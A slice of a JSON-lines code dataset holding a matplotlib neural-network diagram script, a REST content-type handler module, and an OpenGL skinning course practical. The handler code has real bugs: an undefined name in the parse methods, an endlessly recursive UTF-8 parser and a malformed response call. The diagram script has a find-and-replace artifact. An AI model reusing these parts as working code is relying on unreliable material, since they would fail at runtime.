\"\"\"\n p[\"error_image\"][\"bottom\"] = (\n p[\"input\"][\"image\"][\"bottom\"]\n - p[\"input\"][\"image\"][\"height\"]\n * p[\"gap\"][\"error_gap_scale\"]\n - p[\"error_image\"][\"height\"]\n )\n error_image_center = (\n p[\"figure\"][\"width\"]\n - p[\"gap\"][\"right_border\"]\n - p[\"input\"][\"image\"][\"width\"] / 2\n )\n p[\"error_image\"][\"left\"] = (\n error_image_center\n - p[\"error_image\"][\"width\"] / 2\n )\n return p\n\n\ndef add_input_image(fig, image_axes, p, filler_image):\n \"\"\"\n All Axes to be added use the recIMGBORDERgle specification\n (left, bottom, width, height)\n \"\"\"\n absolute_pos = (\n p[\"gap\"][\"left_border\"],\n p[\"input\"][\"image\"][\"bottom\"],\n p[\"input\"][\"image\"][\"width\"],\n p[\"input\"][\"image\"][\"height\"])\n ax_input = add_image_axes(fig, image_axes, p, absolute_pos)\n add_filler_image(\n ax_input,\n p[\"input\"][\"n_rows\"],\n p[\"input\"][\"n_cols\"],\n filler_image\n )\n image_axes.append([ax_input])\n\n\ndef add_node_images(fig, i_layer, image_axes, p, filler_image):\n \"\"\"\n Add in all the node images for a single layer\n \"\"\"\n node_image_left = (\n p[\"gap\"][\"left_border\"]\n + p[\"input\"][\"image\"][\"width\"]\n + i_layer * p[\"node_image\"][\"width\"]\n + (i_layer + 1) * p[\"gap\"][\"between_layer\"]\n )\n n_nodes = p[\"network\"][\"n_nodes\"][i_layer]\n total_layer_height = (\n n_nodes * p[\"node_image\"][\"height\"]\n + (n_nodes - 1) * p[\"gap\"][\"between_node\"]\n )\n layer_bottom = (p[\"figure\"][\"height\"] - total_layer_height) / 2\n layer_axes = []\n for i_node in range(n_nodes):\n node_image_bottom = (\n layer_bottom + i_node * (\n p[\"node_image\"][\"height\"] + p[\"gap\"][\"between_node\"]))\n\n absolute_pos = (\n node_image_left,\n node_image_bottom,\n p[\"node_image\"][\"width\"],\n p[\"node_image\"][\"height\"])\n ax = add_image_axes(fig, image_axes, p, absolute_pos)\n add_filler_image(\n ax,\n p[\"input\"][\"n_rows\"],\n p[\"input\"][\"n_cols\"],\n filler_image\n )\n layer_axes.append(ax)\n image_axes.append(layer_axes)\n\n\ndef add_output_image(fig, image_axes, p, filler_image):\n output_image_left = (\n p[\"figure\"][\"width\"]\n - p[\"input\"][\"image\"][\"width\"]\n - p[\"gap\"][\"right_border\"]\n )\n absolute_pos = (\n output_image_left,\n p[\"input\"][\"image\"][\"bottom\"],\n p[\"input\"][\"image\"][\"width\"],\n p[\"input\"][\"image\"][\"height\"])\n ax_output = add_image_axes(fig, image_axes, p, absolute_pos)\n add_filler_image(\n ax_output,\n p[\"input\"][\"n_rows\"],\n p[\"input\"][\"n_cols\"],\n filler_image\n )\n image_axes.append([ax_output])\n\n\ndef add_error_image(fig, image_axes, p, filler_image):\n absolute_pos = (\n p[\"error_image\"][\"left\"],\n p[\"error_image\"][\"bottom\"],\n p[\"error_image\"][\"width\"],\n p[\"error_image\"][\"height\"])\n ax_error = add_image_axes(fig, image_axes, p, absolute_pos)\n add_filler_image(\n ax_error,\n p[\"input\"][\"n_rows\"],\n p[\"input\"][\"n_cols\"],\n filler_image\n )\n\n\ndef add_image_axes(fig, image_axes, p, absolute_pos):\n \"\"\"\n Locate the Axes for the image corresponding to this node within the Figure.\n absolute_pos: Tuple of\n (left_position, bottom_position, width, height)\n in inches on the Figure.\n \"\"\"\n scaled_pos = (\n absolute_pos[0] / p[\"figure\"][\"width\"],\n absolute_pos[1] / p[\"figure\"][\"height\"],\n absolute_pos[2] / p[\"figure\"][\"width\"],\n absolute_pos[3] / p[\"figure\"][\"height\"])\n ax = fig.add_axes(scaled_pos)\n ax.tick_params(bottom=False, top=False, left=False, right=False)\n ax.tick_params(\n labelbottom=False, labeltop=False, labelleft=False, labelright=False)\n ax.spines[\"top\"].set_color(IMGBORDER)\n ax.spines[\"bottom\"].set_color(IMGBORDER)\n ax.spines[\"left\"].set_color(IMGBORDER)\n ax.spines[\"right\"].set_color(IMGBORDER)\n return ax\n\n\ndef load_filler_image():\n \"\"\"\n Get an image to fill in the node Axes for decoration.\n \"\"\"\n img = Image.open(FILLER_IMAGE_FILENAME)\n img.load()\n color_img = np.asarray(img, dtype=\"int32\")\n # Average the three color channels together to create\n # a monochrome image.\n bw_img = np.mean(color_img, axis=2, dtype=\"int32\")\n return color_img\n\n\ndef add_filler_image(ax, n_im_rows, n_im_cols, filler_image):\n \"\"\"\n Add a chunk of image as a placeholder.\n \"\"\"\n # Note that row 0 is at the top of the image, as is\n # conventional in converting arrays to images.\n top = np.random.randint(filler_image.shape[0] - n_im_rows)\n left = np.random.randint(filler_image.shape[1] - n_im_cols)\n bottom = top + n_im_rows\n right = left + n_im_cols\n fill_patch = filler_image[top: bottom, left: right]\n ax.imshow(fill_patch, cmap=\"inferno\")\n\n\ndef add_layer_connections(ax_boss, image_axes):\n \"\"\"\n Add in the connectors between all the layers\n Treat the input image as the first layer and the output layer as the last.\n \"\"\"\n for i_start_layer in range(len(image_axes) - 1):\n n_start_nodes = len(image_axes[i_start_layer])\n n_end_nodes = len(image_axes[i_start_layer + 1])\n x_start = image_axes[i_start_layer][0].get_position().x1\n x_end = image_axes[i_start_layer + 1][0].get_position().x0\n\n for i_start_ax, ax_start in enumerate(image_axes[i_start_layer]):\n ax_start_pos = ax_start.get_position()\n y_start_min = ax_start_pos.y0\n y_start_max = ax_start_pos.y1\n start_spacing = (y_start_max - y_start_min) / (n_end_nodes + 1)\n\n for i_end_ax, ax_end in enumerate(image_axes[i_start_layer + 1]):\n ax_end_pos = ax_end.get_position()\n y_end_min = ax_end_pos.y0\n y_end_max = ax_end_pos.y1\n end_spacing = (y_end_max - y_end_min) / (n_start_nodes + 1)\n\n # Spread out y_start and y_end a bit\n y_start = y_start_min + start_spacing * (i_end_ax + 1)\n y_end = y_end_min + end_spacing * (i_start_ax + 1)\n plot_connection(ax_boss, x_start, x_end, y_start, y_end)\n\n\ndef plot_connection(ax_boss, x0, x1, y0, y1):\n \"\"\"\n Represent the weights connecting nodes in one layer\n to nodes in the next.\n \"\"\"\n weight = np.random.sample() * 2 - 1\n x = np.linspace(x0, x1, num=50)\n y = y0 + (y1 - y0) * (\n -np.cos(\n np.pi * (x - x0) / (x1 - x0)\n ) + 1) / 2\n if weight > 0:\n conn_color = POS_LINE_COLOR\n else:\n conn_color = NEG_LINE_COLOR\n ax_boss.plot(x, y, color=conn_color, linewidth=LINE_WIDTH_SCALER * weight)\n\n\ndef save_nn_viz(fig):\n \"\"\"\n Generate a new filename for each step of the process.\n \"\"\"\n base_name = \"public/\"\n filename = base_name + \"output.png\"\n fig.savefig(\n filename,\n edgecolor=fig.get_edgecolor(),\n facecolor=fig.get_facecolor(),\n dpi=DPI,\n )\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"vis.py","file_name":"vis.py","file_ext":"py","file_size_in_byte":14895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"19158329","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2017/10/30 16:17\n# @Author : boneix\nimport json\nimport xml\n\nfrom pyconvert.pyconv import convertXML2OBJ, convertJSON2OBJ, convert2JSON, convert2XML\n\nfrom pyrestplus import media_types\n\n\nclass HandlerException(Exception):\n \"\"\" Class for Handler exceptions \"\"\"\n\n def __init__(self, message):\n self.message = message\n\n def __str__(self):\n return repr(self.message)\n\n\nclass RequestHandlerSupport(object):\n def __init__(self):\n self.parsers = {}\n\n def parse(self, content_type, params_types, body):\n method = self.parsers.get(content_type)\n if handler is None or (not hasattr(method, '__call__')):\n raise HandlerException('Can\\'t handler request content_type : %s' % content_type)\n return method(params_types, body)\n\n def register_handler_parser(self, content_type, parser):\n if self.parsers.get(content_type) is not None:\n raise HandlerException('Current handler request content_type %s had register' % content_type)\n self.parsers[content_type] = parser\n\n\nclass RequestHandlerRegister(RequestHandlerSupport):\n def __init__(self):\n super().__init__()\n self.register_handler_parser(media_types.APPLICATION_XML, self.xml_parser)\n self.register_handler_parser(media_types.APPLICATION_JSON, self.json_parser)\n self.register_handler_parser(media_types.APPLICATION_JSON_UTF8, self.json_utf8_parser)\n\n @staticmethod\n def xml_parser(params_types, body):\n if params_types[0] in [str]:\n param_obj = xml.dom.minidom.parseString(body)\n else:\n param_obj = convertXML2OBJ(params_types[0],\n xml.dom.minidom.parseString(body).documentElement)\n return param_obj\n\n @staticmethod\n def json_parser(params_types, body):\n return convertJSON2OBJ(params_types[0], json.loads(body))\n\n @staticmethod\n def json_utf8_parser(params_types, body):\n return RequestHandlerRegister.json_utf8_parser(params_types, str(body, 'utf-8'))\n\n\nclass ResponseHandlerSupport(object):\n def __init__(self):\n self.parsers = {}\n\n def parse(self, content_type, response):\n method = self.parsers.get(content_type)\n if handler is None or (not hasattr(method, '__call__')):\n raise HandlerException('Can\\'t handler response content_type : %s' % content_type)\n return method(content_type)(response)\n\n def register_handler_parser(self, content_type, parser):\n if self.parsers.get(content_type) is not None:\n raise HandlerException('Current handler response content_type %s had register' % content_type)\n self.parsers[content_type] = parser\n\n\nclass ResponseHandlerRegister(ResponseHandlerSupport):\n def __init__(self):\n super().__init__()\n self.register_handler_parser(media_types.APPLICATION_XML, self.xml_parser)\n self.register_handler_parser(media_types.APPLICATION_JSON, self.json_parser)\n self.register_handler_parser(media_types.APPLICATION_JSON_UTF8, self.json_utf8_parser)\n\n @staticmethod\n def xml_parser(response):\n if hasattr(response, '__module__') and not isinstance(\n response, xml.dom.minidom.Document):\n return convert2XML(response)\n elif isinstance(response, xml.dom.minidom.Document):\n return response.toxml()\n else:\n raise HandlerException('Internal Server Error : response is not %s document' % media_types.APPLICATION_XML)\n\n @staticmethod\n def json_parser(response):\n if hasattr(response, '__module__'):\n return convert2JSON(response)\n elif isinstance(response, list):\n return json.dumps(response)\n elif isinstance(response, dict):\n return response\n else:\n raise HandlerException('Internal Server Error : response is not %s document' % media_types.APPLICATION_JSON)\n\n @staticmethod\n def json_utf8_parser(response):\n return ResponseHandlerRegister.json_parser(response)\n\n\nif __name__ == '__main__':\n handler = RequestHandlerRegister()\n # handler.parse()\n","sub_path":"python/python36/pyrestplus/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":4189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"123274118","text":"#!/usr/bin/env python3\n\"\"\"\nPython OpenGL practical application.\n\"\"\"\n# Python built-in modules\nimport os # os function, i.e. checking file status\nfrom itertools import cycle\nimport sys\nfrom bisect import bisect_left # search sorted keyframe lists\n\n# External, non built-in modules\nimport OpenGL.GL as GL # standard Python OpenGL wrapper\nimport glfw # lean window system wrapper for OpenGL\nimport numpy as np # all matrix manipulations & OpenGL args\nimport pyassimp # 3D ressource loader\nimport pyassimp.errors # assimp error management + exceptions\n\nfrom transform import translate, scale, identity, Trackball, sincos\nfrom transform import (lerp, quaternion_slerp, quaternion_matrix, quaternion,\n quaternion_from_euler)\n\n\n# ------------ low level OpenGL object wrappers ----------------------------\nclass Shader:\n \"\"\" Helper class to create and automatically destroy shader program \"\"\"\n @staticmethod\n def _compile_shader(src, shader_type):\n src = open(src, 'r').read() if os.path.exists(src) else src\n src = src.decode('ascii') if isinstance(src, bytes) else src\n shader = GL.glCreateShader(shader_type)\n GL.glShaderSource(shader, src)\n GL.glCompileShader(shader)\n status = GL.glGetShaderiv(shader, GL.GL_COMPILE_STATUS)\n src = ('%3d: %s' % (i+1, l) for i, l in enumerate(src.splitlines()))\n if not status:\n log = GL.glGetShaderInfoLog(shader).decode('ascii')\n GL.glDeleteShader(shader)\n src = '\\n'.join(src)\n print('Compile failed for %s\\n%s\\n%s' % (shader_type, log, src))\n return None\n return shader\n\n def __init__(self, vertex_source, fragment_source):\n \"\"\" Shader can be initialized with raw strings or source file names \"\"\"\n self.glid = None\n vert = self._compile_shader(vertex_source, GL.GL_VERTEX_SHADER)\n frag = self._compile_shader(fragment_source, GL.GL_FRAGMENT_SHADER)\n if vert and frag:\n self.glid = GL.glCreateProgram() # pylint: disable=E1111\n GL.glAttachShader(self.glid, vert)\n GL.glAttachShader(self.glid, frag)\n GL.glLinkProgram(self.glid)\n GL.glDeleteShader(vert)\n GL.glDeleteShader(frag)\n status = GL.glGetProgramiv(self.glid, GL.GL_LINK_STATUS)\n if not status:\n print(GL.glGetProgramInfoLog(self.glid).decode('ascii'))\n GL.glDeleteProgram(self.glid)\n self.glid = None\n\n def __del__(self):\n GL.glUseProgram(0)\n if self.glid: # if this is a valid shader object\n GL.glDeleteProgram(self.glid) # object dies => destroy GL object\n\n\nclass VertexArray:\n \"\"\"helper class to create and self destroy vertex array objects.\"\"\"\n def __init__(self, attributes, index=None, usage=GL.GL_STATIC_DRAW):\n \"\"\" Vertex array from attributes and optional index array. Vertex\n attribs should be list of arrays with dim(0) indexed by vertex. \"\"\"\n\n # create vertex array object, bind it\n self.glid = GL.glGenVertexArrays(1)\n GL.glBindVertexArray(self.glid)\n self.buffers = [] # we will store buffers in a list\n nb_primitives, size = 0, 0\n\n # load a buffer per initialized vertex attribute (=dictionary)\n for loc, data in enumerate(attributes):\n if data is None:\n continue\n\n # bind a new vbo, upload its data to GPU, declare its size and type\n self.buffers += [GL.glGenBuffers(1)]\n data = np.array(data, np.float32, copy=False)\n nb_primitives, size = data.shape\n GL.glEnableVertexAttribArray(loc) # activates for current vao only\n GL.glBindBuffer(GL.GL_ARRAY_BUFFER, self.buffers[-1])\n GL.glBufferData(GL.GL_ARRAY_BUFFER, data, usage)\n GL.glVertexAttribPointer(loc, size, GL.GL_FLOAT, False, 0, None)\n\n # optionally create and upload an index buffer for this object\n self.draw_command = GL.glDrawArrays\n self.arguments = (0, nb_primitives)\n if index is not None:\n self.buffers += [GL.glGenBuffers(1)]\n index_buffer = np.array(index, np.int32, copy=False)\n GL.glBindBuffer(GL.GL_ELEMENT_ARRAY_BUFFER, self.buffers[-1])\n GL.glBufferData(GL.GL_ELEMENT_ARRAY_BUFFER, index_buffer, usage)\n self.draw_command = GL.glDrawElements\n self.arguments = (index_buffer.size, GL.GL_UNSIGNED_INT, None)\n\n # cleanup and unbind so no accidental subsequent state update\n GL.glBindVertexArray(0)\n GL.glBindBuffer(GL.GL_ARRAY_BUFFER, 0)\n GL.glBindBuffer(GL.GL_ELEMENT_ARRAY_BUFFER, 0)\n\n def draw(self, primitive):\n \"\"\"draw a vertex array, either as direct array or indexed array\"\"\"\n GL.glBindVertexArray(self.glid)\n self.draw_command(primitive, *self.arguments)\n GL.glBindVertexArray(0)\n\n def __del__(self): # object dies => kill GL array and buffers from GPU\n GL.glDeleteVertexArrays(1, [self.glid])\n GL.glDeleteBuffers(len(self.buffers), self.buffers)\n\n\n# ------------ simple color fragment shader demonstrated in Practical 1 ------\nCOLOR_VERT = \"\"\"#version 330 core\nlayout(location = 0) in vec3 position;\nlayout(location = 1) in vec3 color;\n\nuniform mat4 modelviewprojection;\nout vec3 fragColor;\n\nvoid main() {\n gl_Position = modelviewprojection * vec4(position, 1);\n fragColor = color;\n}\"\"\"\n\n\nCOLOR_FRAG = \"\"\"#version 330 core\nin vec3 fragColor;\nout vec4 outColor;\nvoid main() {\n outColor = vec4(fragColor, 1);\n}\"\"\"\n\n\n# ------------ Scene object classes ------------------------------------------\nclass Node:\n \"\"\" Scene graph transform and parameter broadcast node \"\"\"\n\n def __init__(self, name='', children=(), transform=identity(), **param):\n self.transform, self.param, self.name = transform, param, name\n self.children = list(iter(children))\n\n def add(self, *drawables):\n \"\"\" Add drawables to this node, simply updating children list \"\"\"\n self.children.extend(drawables)\n\n def draw(self, projection, view, model, **param):\n \"\"\" Recursive draw, passing down named parameters & model matrix. \"\"\"\n # merge named parameters given at initialization with those given here\n param = dict(param, **self.param)\n model = model @ self.transform\n for child in self.children:\n child.draw(projection, view, model, **param)\n\n\n# -------------- Keyframing Utilities TP6 ------------------------------------\nclass KeyFrames:\n \"\"\" Stores keyframe pairs for any value type with interpolation_function\"\"\"\n def __init__(self, time_value_pairs, interpolation_function=lerp):\n if isinstance(time_value_pairs, dict): # convert to list of pairs\n time_value_pairs = time_value_pairs.items()\n keyframes = sorted(((key[0], key[1]) for key in time_value_pairs))\n self.times, self.values = zip(*keyframes) # pairs list -> 2 lists\n self.interpolate = interpolation_function\n\n def value(self, time):\n \"\"\" Computes interpolated value from keyframes, for a given time \"\"\"\n\n # 1. ensure time is within bounds else return boundary keyframe\n if (time <= self.times[0]):\n return self.values[0]\n if (time > self.times[len(self.times) - 1]):\n return self.values[len(self.times) - 1]\n\n # 2. search for closest index entry in self.times, using bisect_left\n insert_index = bisect_left(self.times, time)\n\n # 3. using the retrieved index, interpolate between the two neighboring\n # values in self.values, using the stored self.interpolate function\n fraction = (time - self.times[insert_index - 1])/(self.times[insert_index] - self.times[insert_index - 1])\n\n return self.interpolate(self.values[insert_index - 1], self.values[insert_index], fraction)\n\n\nclass TransformKeyFrames:\n \"\"\" KeyFrames-like object dedicated to 3D transforms \"\"\"\n def __init__(self, translate_keys, rotate_keys, scale_keys):\n \"\"\" stores 3 keyframe sets for translation, rotation, scale \"\"\"\n self.translate_keys = KeyFrames(translate_keys, interpolation_function=lerp)\n self.scale_keys = KeyFrames(scale_keys, interpolation_function=lerp)\n self.rotate_keys = KeyFrames(rotate_keys, interpolation_function=quaternion_slerp)\n\n def value(self, time):\n \"\"\" Compute each component's interpolation and compose TRS matrix \"\"\"\n translate_matrix = translate(*self.translate_keys.value(time))\n scale_matrix = scale(self.scale_keys.value(time))\n rotate_matrix = quaternion_matrix(self.rotate_keys.value(time))\n return translate_matrix @ rotate_matrix @ scale_matrix\n\n\nclass KeyFrameControlNode(Node):\n \"\"\" Place node with transform keys above a controlled subtree \"\"\"\n def __init__(self, trans_keys, rotat_keys, scale_keys, **kwargs):\n super().__init__(**kwargs)\n self.keyframes = TransformKeyFrames(trans_keys, rotat_keys, scale_keys)\n\n def draw(self, projection, view, model, **param):\n \"\"\" When redraw requested, interpolate our node transform from keys \"\"\"\n self.transform = self.keyframes.value(glfw.get_time())\n super().draw(projection, view, model, **param)\n\n\n# -------------- Linear Blend Skinning : TP7 ---------------------------------\nMAX_VERTEX_BONES = 4\nMAX_BONES = 128\n\n# new shader for skinned meshes, fully compatible with previous color fragment\n# TODO: complete the loop for TP7 exercise 1\nSKINNING_VERT = \"\"\"#version 330 core\n// ---- camera geometry\nuniform mat4 projection, view;\n\n// ---- skinning globals and attributes\nconst int MAX_VERTEX_BONES=%d, MAX_BONES=%d;\nuniform mat4 boneMatrix[MAX_BONES];\n\n// ---- vertex attributes\nlayout(location = 0) in vec3 position;\nlayout(location = 1) in vec3 color;\nlayout(location = 2) in vec4 bone_ids;\nlayout(location = 3) in vec4 bone_weights;\n\n// ----- interpolated attribute variables to be passed to fragment shader\nout vec3 fragColor;\n\nvoid main() {\n\n // ------ creation of the skinning deformation matrix\n //mat4 skinMatrix = mat4(1.); // TODO complete shader here for exercise 1!\n\n mat4 skinMatrix = mat4(0.);\n int i;\n float s = 0.0;\n for(i=0; i < MAX_VERTEX_BONES; i++){\n s = s + bone_weights[i];\n }\n for(i=0; i < MAX_VERTEX_BONES; i++){\n //skinMatrix = skinMatrix + bone_weights[int(bone_ids[i])]*boneMatrix[int(bone_ids[i])];\n //skinMatrix = skinMatrix + bone_weights[int(bone_ids[i])]*boneMatrix[int(bone_ids[i])];\n skinMatrix = skinMatrix + bone_weights[i]*boneMatrix[int(bone_ids[i])];\n }\n\n // ------ compute world and normalized eye coordinates of our vertex\n vec4 wPosition4 = (1./s) * skinMatrix * vec4(position, 1.0);\n gl_Position = projection * view * wPosition4;\n\n fragColor = color;\n}\n\"\"\" % (MAX_VERTEX_BONES, MAX_BONES)\n\n\nclass SkinnedMesh:\n \"\"\"class of skinned mesh nodes in scene graph \"\"\"\n def __init__(self, attributes, bone_nodes, bone_offsets, index=None):\n\n # setup shader attributes for linear blend skinning shader\n self.vertex_array = VertexArray(attributes, index)\n\n # feel free to move this up in Viewer as shown in previous practicals\n self.skinning_shader = Shader(SKINNING_VERT, COLOR_FRAG)\n\n # store skinning data\n self.bone_nodes = bone_nodes\n self.bone_offsets = bone_offsets\n\n def draw(self, projection, view, _model, **_kwargs):\n \"\"\" skinning object draw method \"\"\"\n\n shid = self.skinning_shader.glid\n GL.glUseProgram(shid)\n\n # setup camera geometry parameters\n loc = GL.glGetUniformLocation(shid, 'projection')\n GL.glUniformMatrix4fv(loc, 1, True, projection)\n loc = GL.glGetUniformLocation(shid, 'view')\n GL.glUniformMatrix4fv(loc, 1, True, view)\n\n # bone world transform matrices need to be passed for skinning\n for bone_id, node in enumerate(self.bone_nodes):\n bone_matrix = node.world_transform @ self.bone_offsets[bone_id]\n\n bone_loc = GL.glGetUniformLocation(shid, 'boneMatrix[%d]' % bone_id)\n GL.glUniformMatrix4fv(bone_loc, 1, True, bone_matrix)\n\n # draw mesh vertex array\n self.vertex_array.draw(GL.GL_TRIANGLES)\n\n # leave with clean OpenGL state, to make it easier to detect problems\n GL.glUseProgram(0)\n\n\n# -------- Skinning Control for Keyframing Skinning Mesh Bone Transforms ------\nclass SkinningControlNode(Node):\n \"\"\" Place node with transform keys above a controlled subtree \"\"\"\n def __init__(self, *keys, **kwargs):\n super().__init__(**kwargs)\n self.keyframes = TransformKeyFrames(*keys) if keys[0] else None\n self.world_transform = identity()\n\n def draw(self, projection, view, model, **param):\n \"\"\" When redraw requested, interpolate our node transform from keys \"\"\"\n if self.keyframes: # no keyframe update should happens if no keyframes\n self.transform = self.keyframes.value(glfw.get_time())\n\n # store world transform for skinned meshes using this node as bone\n self.world_transform = model @ self.transform\n\n # default node behaviour (call children's draw method)\n super().draw(projection, view, model, **param)\n\n\n# -------------- Deformable Cylinder Mesh ------------------------------------\nclass SkinnedCylinder(SkinningControlNode):\n \"\"\" Deformable cylinder \"\"\"\n def __init__(self, sections=11, quarters=20, **params):\n\n # this \"arm\" node and its transform serves as control node for bone 0\n # we give it the default identity keyframe transform, doesn't move\n super().__init__({0: (0, 0, 0)}, {0: quaternion()}, {0: 1}, **params)\n\n # we add a son \"forearm\" node with animated rotation for the second\n # part of the cylinder\n self.add(SkinningControlNode(\n {0: (0, 0, 0)},\n {0: quaternion(), 2: quaternion_from_euler(90), 4: quaternion()},\n {0: 1}))\n\n # there are two bones in this animation corresponding to above noes\n bone_nodes = [self, self.children[0]]\n\n # these bones have no particular offset transform\n bone_offsets = [identity(), identity()]\n\n # vertices, per vertex bone_ids and weights\n vertices, faces, bone_id, bone_weights = [], [], [], []\n for x_c in range(sections+1):\n for angle in range(quarters):\n # compute vertex coordinates sampled on a cylinder\n z_c, y_c = sincos(360 * angle / quarters)\n vertices.append((x_c - sections/2, y_c, z_c))\n\n # the index of the 4 prominent bones influencing this vertex.\n # since in this example there are only 2 bones, every vertex\n # is influenced by the two only bones 0 and 1\n bone_id.append((0, 1, 0, 0))\n\n # per-vertex weights for the 4 most influential bones given in\n # a vec4 vertex attribute. Not using indices 2 & 3 => 0 weight\n # vertex weight is currently a hard transition in the middle\n # of the cylinder\n # TODO: modify weights here for TP7 exercise 2\n #weight = 1 if x_c <= sections/2 else 0\n #if x_c <= sections/4:\n # weight = 1\n #elif x_c >= 3*sections/4:\n # weight = 0\n #else:\n # weight = lerp(3*sections/4, sections/4, 2*x_c/sections)\n\n #weight = lerp(1, 0, x_c/sections)\n\n weight = 1/(1 + 2*(-(x_c- sections)/sections))\n\n\n bone_weights.append((weight, 1 - weight, 0, 0))\n\n # face indices\n faces = []\n for x_c in range(sections):\n for angle in range(quarters):\n\n # indices of the 4 vertices of the current quad, % helps\n # wrapping to finish the circle sections\n ir0c0 = x_c * quarters + angle\n ir1c0 = (x_c + 1) * quarters + angle\n ir0c1 = x_c * quarters + (angle + 1) % quarters\n ir1c1 = (x_c + 1) * quarters + (angle + 1) % quarters\n\n # add the 2 corresponding triangles per quad on the cylinder\n faces.extend([(ir0c0, ir0c1, ir1c1), (ir0c0, ir1c1, ir1c0)])\n\n # the skinned mesh itself. it doesn't matter where in the hierarchy\n # this is added as long as it has the proper bone_node table\n self.add(SkinnedMesh([vertices, bone_weights, bone_id, bone_weights],\n bone_nodes, bone_offsets, faces))\n\n\n# -------------- 3D resource loader -------------------------------------------\ndef load_skinned(file):\n \"\"\"load resources from file using pyassimp, return node hierarchy \"\"\"\n try:\n option = pyassimp.postprocess.aiProcessPreset_TargetRealtime_MaxQuality\n scene = pyassimp.load(file, option)\n except pyassimp.errors.AssimpError:\n print('ERROR: pyassimp unable to load', file)\n return []\n\n # ----- load animations\n def conv(assimp_keys, ticks_per_second):\n \"\"\" Conversion from assimp key struct to our dict representation \"\"\"\n return {key.time / ticks_per_second: key.value for key in assimp_keys}\n\n # load first animation in scene file (could be a loop over all animations)\n transform_keyframes = {}\n if scene.animations:\n anim = scene.animations[0]\n for channel in anim.channels:\n # for each animation bone, store trs dict with {times: transforms}\n # (pyassimp name storage bug, bytes instead of str => convert it)\n transform_keyframes[channel.nodename.data.decode('utf-8')] = (\n conv(channel.positionkeys, anim.tickspersecond),\n conv(channel.rotationkeys, anim.tickspersecond),\n conv(channel.scalingkeys, anim.tickspersecond)\n )\n\n # ---- prepare scene graph nodes\n # create SkinningControlNode for each assimp node.\n # node creation needs to happen first as SkinnedMeshes store an array of\n # these nodes that represent their bone transforms\n nodes = {} # nodes: string name -> node dictionary\n\n def make_nodes(pyassimp_node):\n \"\"\" Recursively builds nodes for our graph, matching pyassimp nodes \"\"\"\n trs_keyframes = transform_keyframes.get(pyassimp_node.name, (None,))\n\n node = SkinningControlNode(*trs_keyframes, name=pyassimp_node.name,\n transform=pyassimp_node.transformation)\n nodes[pyassimp_node.name] = node, pyassimp_node\n node.add(*(make_nodes(child) for child in pyassimp_node.children))\n return node\n\n root_node = make_nodes(scene.rootnode)\n\n # ---- create SkinnedMesh objects\n for mesh in scene.meshes:\n # -- skinned mesh: weights given per bone => convert per vertex for GPU\n # first, populate an array with MAX_BONES entries per vertex\n v_bone = np.array([[(0, 0)]*MAX_BONES] * mesh.vertices.shape[0],\n dtype=[('weight', 'f4'), ('id', 'u4')])\n for bone_id, bone in enumerate(mesh.bones[:MAX_BONES]):\n for entry in bone.weights: # weight,id pairs necessary for sorting\n v_bone[entry.vertexid][bone_id] = (entry.weight, bone_id)\n\n v_bone.sort(order='weight') # sort rows, high weights last\n v_bone = v_bone[:, -MAX_VERTEX_BONES:] # limit bone size, keep highest\n\n # prepare bone lookup array & offset matrix, indexed by bone index (id)\n bone_nodes = [nodes[bone.name][0] for bone in mesh.bones]\n bone_offsets = [bone.offsetmatrix for bone in mesh.bones]\n\n # initialize skinned mesh and store in pyassimp_mesh for node addition\n mesh.skinned_mesh = SkinnedMesh(\n [mesh.vertices, mesh.normals, v_bone['id'], v_bone['weight']],\n bone_nodes, bone_offsets, mesh.faces\n )\n\n # ------ add each mesh to its intended nodes as indicated by assimp\n for final_node, assimp_node in nodes.values():\n final_node.add(*(_mesh.skinned_mesh for _mesh in assimp_node.meshes))\n\n nb_triangles = sum((mesh.faces.shape[0] for mesh in scene.meshes))\n print('Loaded', file, '\\t(%d meshes, %d faces, %d nodes, %d animations)' %\n (len(scene.meshes), nb_triangles, len(nodes), len(scene.animations)))\n pyassimp.release(scene)\n return [root_node]\n\n\n# ------------ Viewer class & window management ------------------------------\nclass GLFWTrackball(Trackball):\n \"\"\" Use in Viewer for interactive viewpoint control \"\"\"\n\n def __init__(self, win):\n \"\"\" Init needs a GLFW window handler 'win' to register callbacks \"\"\"\n super().__init__()\n self.mouse = (0, 0)\n glfw.set_cursor_pos_callback(win, self.on_mouse_move)\n glfw.set_scroll_callback(win, self.on_scroll)\n\n def on_mouse_move(self, win, xpos, ypos):\n \"\"\" Rotate on left-click & drag, pan on right-click & drag \"\"\"\n old = self.mouse\n self.mouse = (xpos, glfw.get_window_size(win)[1] - ypos)\n if glfw.get_mouse_button(win, glfw.MOUSE_BUTTON_LEFT):\n self.drag(old, self.mouse, glfw.get_window_size(win))\n if glfw.get_mouse_button(win, glfw.MOUSE_BUTTON_RIGHT):\n self.pan(old, self.mouse)\n\n def on_scroll(self, win, _deltax, deltay):\n \"\"\" Scroll controls the camera distance to trackball center \"\"\"\n self.zoom(deltay, glfw.get_window_size(win)[1])\n\n\nclass Viewer:\n \"\"\" GLFW viewer window, with classic initialization & graphics loop \"\"\"\n\n def __init__(self, width=640, height=480):\n\n # version hints: create GL window with >= OpenGL 3.3 and core profile\n glfw.window_hint(glfw.CONTEXT_VERSION_MAJOR, 3)\n glfw.window_hint(glfw.CONTEXT_VERSION_MINOR, 3)\n glfw.window_hint(glfw.OPENGL_FORWARD_COMPAT, GL.GL_TRUE)\n glfw.window_hint(glfw.OPENGL_PROFILE, glfw.OPENGL_CORE_PROFILE)\n glfw.window_hint(glfw.RESIZABLE, False)\n self.win = glfw.create_window(width, height, 'Viewer', None, None)\n\n # make win's OpenGL context current; no OpenGL calls can happen before\n glfw.make_context_current(self.win)\n\n # register event handlers\n glfw.set_key_callback(self.win, self.on_key)\n\n # useful message to check OpenGL renderer characteristics\n print('OpenGL', GL.glGetString(GL.GL_VERSION).decode() + ', GLSL',\n GL.glGetString(GL.GL_SHADING_LANGUAGE_VERSION).decode() +\n ', Renderer', GL.glGetString(GL.GL_RENDERER).decode())\n\n # initialize GL by setting viewport and default render characteristics\n GL.glClearColor(0.1, 0.1, 0.1, 0.1)\n GL.glEnable(GL.GL_DEPTH_TEST) # depth test now enabled (TP2)\n GL.glEnable(GL.GL_CULL_FACE) # backface culling enabled (TP2)\n\n # compile and initialize shader programs once 